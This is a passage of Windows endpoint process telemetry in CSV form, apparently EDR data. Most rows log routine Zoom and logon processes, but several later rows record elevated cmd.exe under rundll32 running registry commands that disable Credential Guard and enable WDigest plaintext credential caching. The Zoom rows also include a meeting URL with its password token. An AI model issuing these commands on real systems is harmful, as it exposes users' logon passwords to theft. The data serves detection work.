00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:57:31.023621200+00:00,2021-06-25 00:57:53.270243800+00:00,05d525ec-45c0-4b27-b42e-c2750c817d6d,computerpii_0a470890c60768167990033d701e7bd881398861,182428,False,10.7740.19041.1052,False,11540474045136908,,11540474045178572,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+1203,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:50:01.326462600+00:00,14952,Zoom.exe,"""Zoom.exe""  --action=preload --runaszvideo=TRUE ",PortableExecutable,2021-05-31 03:58:56.891511300+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\Zoom.exe,265512,a5f51104ade430c5c5e0e2cf9fc3ccf6,89b22f541ab086dd9095dffd776cbe03d935dd5c0c8603da6651f4d947a6ae00,1d95d4ad2a8e8988a1cdfd43c08444b8ab5ad9ae,a5f51104ade430c5c5e0e2cf9fc3ccf6,89b22f541ab086dd9095dffd776cbe03d935dd5c0c8603da6651f4d947a6ae00,1d95d4ad2a8e8988a1cdfd43c08444b8ab5ad9ae,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 11:01:19.317436400+00:00,10916,Zoom.exe,"""Zoom.exe"" ""--url=zoommtg://us04web.zoom.us/join?action=join&confno=8311482309&pwd=ZUVwdmEvaUNrRkdMQm8rd0VEWFBNUT09&confid=dXRpZD1VVElEX2VkNDg2YjYzYWNmNzQ0ZDU5NGMwMzAwN2Q0MWI1NDFkJnVzcz1xamxRakx0SG9pZ1ZSVWpwQ0E2YUhUdWFwWjFaVmJUeURxTDVWeVJ5M3dMZnRGZUF2OWFoV3ZuRWFJQzh2cWxrbkhUc1pOUlBTZS16NXZhRUQzYmZ1WThNaXZoQ3I1UUVuTWsuLUEtZmtZZFZlLXVUTjFociZ0aWQ9MGNjMTczYzRhNDQ0NGMwMzg5YjBjMGI2MjVjMzZiYTc%3D&browser=chrome""",False,2021-06-24 10:59:28.981045+00:00,10072,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:50:01.349411900+00:00,2021-06-25 00:36:15.805963800+00:00,ff909b1b-286a-4f13-893d-a2fb585a1490,computerpii_0a470890c60768167990033d701e7bd881398861,180259,False,10.7740.19041.1052,False,11540474045177949,,11540474045178083,2021-06-24 11:01:19.317436400+00:00,10916,2021-06-24 11:01:19.317436400+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\Zoom.exe,10916,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin,265512,2021-05-24 12:23:32+00:00,2021-05-31 03:58:55.590307100+00:00,2021-06-24 11:01:19.343238+00:00,2021-05-31 03:58:56.891511300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Zoom Video Communications, Inc.",Zoom,"5,6,6,961",Zoom,Zoom,Zoom Meetings,"Zoom Video Communications, Inc.",Zoom,"5,6,6,961",Zoom,Zoom,Zoom Meetings
+1204,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:50:02.184016300+00:00,4864,Zoom.exe,Zoom.exe --action=cleanTmpFile --data=data,PortableExecutable,2021-05-31 03:58:56.891511300+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\Zoom.exe,265512,a5f51104ade430c5c5e0e2cf9fc3ccf6,89b22f541ab086dd9095dffd776cbe03d935dd5c0c8603da6651f4d947a6ae00,1d95d4ad2a8e8988a1cdfd43c08444b8ab5ad9ae,a5f51104ade430c5c5e0e2cf9fc3ccf6,89b22f541ab086dd9095dffd776cbe03d935dd5c0c8603da6651f4d947a6ae00,1d95d4ad2a8e8988a1cdfd43c08444b8ab5ad9ae,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 11:01:19.317436400+00:00,10916,Zoom.exe,"""Zoom.exe"" ""--url=zoommtg://us04web.zoom.us/join?action=join&confno=8311482309&pwd=ZUVwdmEvaUNrRkdMQm8rd0VEWFBNUT09&confid=dXRpZD1VVElEX2VkNDg2YjYzYWNmNzQ0ZDU5NGMwMzAwN2Q0MWI1NDFkJnVzcz1xamxRakx0SG9pZ1ZSVWpwQ0E2YUhUdWFwWjFaVmJUeURxTDVWeVJ5M3dMZnRGZUF2OWFoV3ZuRWFJQzh2cWxrbkhUc1pOUlBTZS16NXZhRUQzYmZ1WThNaXZoQ3I1UUVuTWsuLUEtZmtZZFZlLXVUTjFociZ0aWQ9MGNjMTczYzRhNDQ0NGMwMzg5YjBjMGI2MjVjMzZiYTc%3D&browser=chrome""",False,2021-06-24 10:59:28.981045+00:00,10072,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:50:02.213532100+00:00,2021-06-25 00:36:15.826201800+00:00,4d75f4aa-0383-41f5-a0c8-b34b5b488d22,computerpii_0a470890c60768167990033d701e7bd881398861,180295,False,10.7740.19041.1052,False,11540474045177949,,11540474045178084,2021-06-24 11:01:19.317436400+00:00,10916,2021-06-24 11:01:19.317436400+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin\Zoom.exe,10916,2176,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Roaming\Zoom\bin,265512,2021-05-24 12:23:32+00:00,2021-05-31 03:58:55.590307100+00:00,2021-06-24 11:01:19.343238+00:00,2021-05-31 03:58:56.891511300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Zoom Video Communications, Inc.",Zoom,"5,6,6,961",Zoom,Zoom,Zoom Meetings,"Zoom Video Communications, Inc.",Zoom,"5,6,6,961",Zoom,Zoom,Zoom Meetings
+1205,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 11:50:09.489133800+00:00,17800,smss.exe,smss.exe 00000128 00000088 C:\Windows\System32\WinLogon.exe -SpecialSession,PortableExecutable,2021-05-12 01:12:36.677345+00:00,C:\Windows\System32\smss.exe,155976,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:07.324991200+00:00,728,smss.exe,smss.exe,True,2021-06-10 00:46:07.323061100+00:00,4,%system%\ntoskrnl.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:50:09.696068200+00:00,2021-06-25 00:36:15.826761100+00:00,7eb9f067-0d78-4ad3-b223-37beed29c86b,computerpii_0a470890c60768167990033d701e7bd881398861,180303,False,10.7740.19041.1052,False,11540474045136899,,11540474045178086,2021-06-10 00:46:07.324991200+00:00,728,2021-06-10 00:46:07.324991200+00:00,\Device\HarddiskVolume3\Windows\System32\smss.exe,728,18560,ActiveProcessStartkey,C:\Windows\System32,155976,2022-03-18 20:18:05+00:00,2021-05-12 01:12:36.681334+00:00,2021-06-10 00:46:10.497846200+00:00,2021-05-12 01:12:36.677345+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager
+1206,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 11:50:09.515027300+00:00,6988,csrss.exe,"csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16",PortableExecutable,2020-10-09 20:47:25.808617300+00:00,C:\Windows\System32\csrss.exe,17600,72565e7a0145e0657e586f6cf7696dc7,6f1c9b4c187669bc0371260d121caf48d65f829a9104c483befbd8fc0bed24f5,11eba7b1e26cc7d492a2c161ac48370811d0b01e,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 11:50:09.489133800+00:00,17800,smss.exe,smss.exe 00000128 00000088 C:\Windows\System32\WinLogon.exe -SpecialSession,True,2021-06-10 00:46:07.324991200+00:00,728,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:50:09.697167900+00:00,2021-06-25 00:36:15.826847900+00:00,463598f7-6b9b-4990-a726-ec2530cc4d8e,computerpii_0a470890c60768167990033d701e7bd881398861,180304,False,10.7740.19041.1052,False,11540474045178086,,11540474045178087,2021-06-24 11:50:09.489133800+00:00,17800,2021-06-24 11:50:09.489133800+00:00,\Device\HarddiskVolume3\Windows\System32\smss.exe,17800,128,TerminateProcessStartkey,C:\Windows\System32,155976,2022-03-18 20:18:05+00:00,2021-05-12 01:12:36.681334+00:00,2021-06-24 11:50:09.493339+00:00,2021-05-12 01:12:36.677345+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,CSRSS.Exe,CSRSS.Exe,Client Server Runtime Process
+1207,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 11:50:09.647766100+00:00,14008,winlogon.exe,WinLogon.exe -SpecialSession,PortableExecutable,2021-04-14 01:10:22.046876900+00:00,C:\Windows\System32\winlogon.exe,907776,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,2c3f91bb4c0994a7b36ed0b6b14ec9c7,56afe5133fdc5806ec6b19436f7b55f1499cfc94619740c171424fbcf7808fd3,53311cbde782da05c8ef97d7bc40d768e3a3ea64,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 11:50:09.489133800+00:00,17800,smss.exe,smss.exe 00000128 00000088 C:\Windows\System32\WinLogon.exe -SpecialSession,True,2021-06-10 00:46:07.324991200+00:00,728,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:50:09.706821200+00:00,2021-06-25 00:36:15.826914300+00:00,2e97cb64-c408-4497-bfed-e8d1b3e0d8cb,computerpii_0a470890c60768167990033d701e7bd881398861,180305,False,10.7740.19041.1052,False,11540474045178086,,11540474045178088,2021-06-24 11:50:09.489133800+00:00,17800,2021-06-24 11:50:09.489133800+00:00,\Device\HarddiskVolume3\Windows\System32\smss.exe,17800,128,TerminateProcessStartkey,C:\Windows\System32,155976,2022-03-18 20:18:05+00:00,2021-05-12 01:12:36.681334+00:00,2021-06-24 11:50:09.493339+00:00,2021-05-12 01:12:36.677345+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,smss.exe,smss.exe,Windows Session Manager,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application
+1208,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 11:50:09.653971400+00:00,12016,LogonUI.exe,"""LogonUI.exe"" /flags:0x4 /state0:0xb3400055 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 10:02:05.609829800+00:00,2036,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-24 10:02:05.542723800+00:00,5216,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:50:09.708766100+00:00,2021-06-25 00:36:15.826990900+00:00,8b61a210-19ee-452c-9232-ae3b82211697,computerpii_0a470890c60768167990033d701e7bd881398861,180306,False,10.7740.19041.1052,False,11540474045177782,,11540474045178089,2021-06-24 10:02:05.609829800+00:00,2036,2021-06-24 10:02:05.609829800+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,2036,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-24 10:02:05.605706600+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+1209,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 11:50:09.732825700+00:00,12832,LogonUI.exe,"""LogonUI.exe"" /flags:0x2 /state0:0xb3401855 /state1:0x41c64e6d",PortableExecutable,2019-12-07 09:08:19.659069+00:00,C:\Windows\System32\LogonUI.exe,13824,893144fe49aa16124b5bd3034e79bbc6,cf01e46c146699f6c0e3dd447043f59bc9438dbbcb9563af6c60ebc6d82727f2,fbf39a288fc46cbf0620cfd297395a8fb4fbcdad,ee86712ddf0c59e6921d548b5548ff9c,6bcb35ba7cdfe08e2c3a2e77cac9facc8152a97df411a4eec1985d0b09cf6e8c,5389629acd37fd08c8485b1f30555d441becf06a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 11:50:09.647766100+00:00,14008,winlogon.exe,WinLogon.exe -SpecialSession,True,2021-06-24 11:50:09.489133800+00:00,17800,\Device\HarddiskVolume3\Windows\System32\smss.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:50:09.851046100+00:00,2021-06-25 00:36:15.827207300+00:00,9f5b3835-0c16-433f-8924-266b05856e20,computerpii_0a470890c60768167990033d701e7bd881398861,180310,False,10.7740.19041.1052,False,11540474045178088,,11540474045178091,2021-06-24 11:50:09.647766100+00:00,14008,2021-06-24 11:50:09.647766100+00:00,\Device\HarddiskVolume3\Windows\System32\winlogon.exe,14008,128,ActiveProcessStartkey,C:\Windows\System32,907776,1977-08-22 04:06:37+00:00,2021-04-14 01:10:22.068262900+00:00,2021-06-24 11:50:09.650809300+00:00,2021-04-14 01:10:22.046876900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,0.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,winlogon,WINLOGON.EXE,Windows Logon Application,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,logonui.exe,logonui.exe,Windows Logon User Interface Host
+1210,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:49:52.522321900+00:00,7560,cmd.exe,"""cmd.exe"" /c ""reg add hklm\system\currentcontrolset\control\lsa /v LsaCfgFlags /t reg_dword /d 0 /f                             """,PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:31:13.489936600+00:00,12940,cmd.exe,cmd.exe ,True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:49:52.918704800+00:00,2021-06-23 03:52:07.522974200+00:00,a61891b9-5a41-4771-8e2b-068f31bdd28b,computerpii_0a470890c60768167990033d701e7bd881398861,162056,False,10.7740.19041.1052,False,11540474045173177,,11540474045173250,2021-06-23 03:31:13.489936600+00:00,12940,2021-06-23 03:31:13.489936600+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,12940,18560,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,0.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1211,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:49:52.556154700+00:00,15624,reg.exe,reg  add hklm\system\currentcontrolset\control\lsa /v LsaCfgFlags /t reg_dword /d 0 /f                             ,PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\reg.exe,77312,227f63e1d9008b36bdbcc4b397780be4,c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d,c0db341defa8ef40c03ed769a9001d600e0f4dae,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:49:52.522321900+00:00,7560,cmd.exe,"""cmd.exe"" /c ""reg add hklm\system\currentcontrolset\control\lsa /v LsaCfgFlags /t reg_dword /d 0 /f                             """,True,2021-06-23 03:31:13.489936600+00:00,12940,\Device\HarddiskVolume3\Windows\System32\cmd.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:49:52.919387400+00:00,2021-06-23 03:52:07.523074300+00:00,7c0df583-7ebb-442f-9bc7-abe5120059d6,computerpii_0a470890c60768167990033d701e7bd881398861,162057,False,10.7740.19041.1052,False,11540474045173250,,11540474045173251,2021-06-23 03:49:52.522321900+00:00,7560,2021-06-23 03:49:52.522321900+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,7560,18560,TerminateProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,reg.exe,reg.exe,Registry Console Tool
+1212,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:49:54.083880800+00:00,2992,cmd.exe,"""cmd.exe"" /c ""reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f""",PortableExecutable,2021-02-17 04:34:58.875918800+00:00,C:\Windows\System32\cmd.exe,289792,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:31:13.489936600+00:00,12940,cmd.exe,cmd.exe ,True,2021-06-23 03:16:43.971462700+00:00,16760,\Device\HarddiskVolume3\Windows\System32\rundll32.exe,High,TokenElevationTypeFull,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:49:54.929822500+00:00,2021-06-23 03:52:07.523260500+00:00,90446a10-8d39-4dff-9c78-21a4fe1feca7,computerpii_0a470890c60768167990033d701e7bd881398861,162059,False,10.7740.19041.1052,False,11540474045173177,,11540474045173252,2021-06-23 03:31:13.489936600+00:00,12940,2021-06-23 03:31:13.489936600+00:00,\Device\HarddiskVolume3\Windows\System32\cmd.exe,12940,18560,ActiveProcessStartkey,C:\Windows\System32,289792,2090-01-16 09:26:43+00:00,2021-02-17 04:34:58.881082900+00:00,2021-06-23 03:08:14.153437700+00:00,2021-02-17 04:34:58.875918800+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102296,388102296,False,0.0,1.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,cmd,Cmd.Exe,Windows Command Processor
+1213,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-23 03:49:54.101197900+00:00,8716,reg.exe,reg  add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f,PortableExecutable,2019-12-07 09:09:33.990210300+00:00,C:\Windows\System32\reg.exe,77312,227f63e1d9008b36bdbcc4b397780be4,c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d,c0db341defa8ef40c03ed769a9001d600e0f4dae,8a2122e8162dbef04694b9c3e0b6cdee,b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450,f1efb0fddc156e4c61c5f78a54700e4e7984d55d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 